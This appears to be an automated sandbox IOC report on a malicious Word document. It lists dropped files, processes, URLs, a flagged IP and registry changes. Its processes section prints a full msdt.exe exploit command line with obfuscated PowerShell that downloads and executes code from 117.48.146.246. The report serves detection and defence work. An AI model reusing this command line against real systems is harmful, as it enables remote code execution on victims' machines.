IOC Report
ZDhoKQk8G6.docx

loading gif

Files

File Path
Type
Category
Malicious
ZDhoKQk8G6.docx
Microsoft OOXML
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BD38C65E.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FDE2BFD0.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\exploit[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\55B4C23D-1D64-4775-A6AC-18A4AA5015F2
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\286E221C.png
PNG image data, 493 x 237, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\43EAE36D.png
PNG image data, 500 x 265, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1665181B-BE6F-4450-B18D-4FDB1C0CE1BF}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D2AA093F-09B9-4C47-B6FB-795EB3F5FD54}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{F2C76BF2-4CF4-4700-BD79-0D7D3DAFB172}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\exploit[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
downloaded
C:\Users\user\AppData\Local\Temp\RES6C14.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESBA29.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESE188.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\gie0zkoe\CSC6E91F038F5FB428487DA67C522375FDA.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\gie0zkoe\gie0zkoe.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\q1lqs4gq\CSCC9E4AB822F7C4A9C9D2938CDBE8BABC6.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\q1lqs4gq\q1lqs4gq.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\wxccc1jj\CSC53AA8B1A30F84583A884CFB153C6F39.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\wxccc1jj\wxccc1jj.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ZDhoKQk8G6.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 08:43:08 2022, mtime=Wed Jun 15 04:17:04 2022, atime=Wed Jun 15 04:16:49 2022, length=449949, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Little-endian UTF-16 Unicode text, with CR line terminators
dropped
C:\Users\user\Desktop\~$hoKQk8G6.docx
data
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_dd1f1f1a-d45a-4beb-a625-d8b138881117\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A40B0AC-ACBB-463B-8DC0-568E01ED388D}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FD4A456-B142-48A7-8A26-7CC29A810637}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm
HTML document, ASCII text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B14BFC0.png
PNG image data, 500 x 265, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F20135FB.png
PNG image data, 493 x 237, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0F1199C9-FFD7-4240-8F04-53D52631A074}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3D2E09D-939E-4CE8-8CEF-3005BD062461}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F2A88E0D-A9AE-4C78-97ED-928ECF332904}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{4EBE4D7B-7080-4C78-9E4E-C39E5F92BCD0}
data
dropped
C:\Users\user\AppData\Local\Temp\{6B16DF9D-3276-41E2-93CB-F148AEE50BE1}
data
dropped
There are 44 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param " IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Inv`o`ke-Ex`pr`e`s`sion($(Inv`o`ke-Ex`pr`e`s`sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxccc1jj\wxccc1jj.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA29.tmp" "c:\Users\user\AppData\Local\Temp\wxccc1jj\CSC53AA8B1A30F84583A884CFB153C6F39.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gie0zkoe\gie0zkoe.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE188.tmp" "c:\Users\user\AppData\Local\Temp\gie0zkoe\CSC6E91F038F5FB428487DA67C522375FDA.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q1lqs4gq\q1lqs4gq.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C14.tmp" "c:\Users\user\AppData\Local\Temp\q1lqs4gq\CSCC9E4AB822F7C4A9C9D2938CDBE8BABC6.TMP"
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

URLs

Name
IP
Malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://img1.18183.com/image/20220427/1651040288153109.png
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://img1.18183.com/image/20220427/1651040297422300.png
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://img1.18183.com/image/20220427/1651040303449177.png
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
https://management.azure.com/
unknown
https://messaging.lifecycle.office.com/getcustommessage16
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://graph.windows.net/
unknown
https://api.powerbi.com/beta/myorg/imports
unknown
https://devnull.onenote.com
unknown
https://messaging.action.office.com/
unknown
https://ncus.pagecontentsync.
unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
117.48.146.246
unknown
China
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
?3.
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
`3.
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
~5.
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
4<.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\1E376
1E376
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Helvetica
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiLight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiBold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Light SemiCondensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiLight SemiConde
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiCondensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiBold SemiConden
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Light Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiLight Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bahnschrift SemiBold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gadugi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ink Free
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Javanese Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei Light
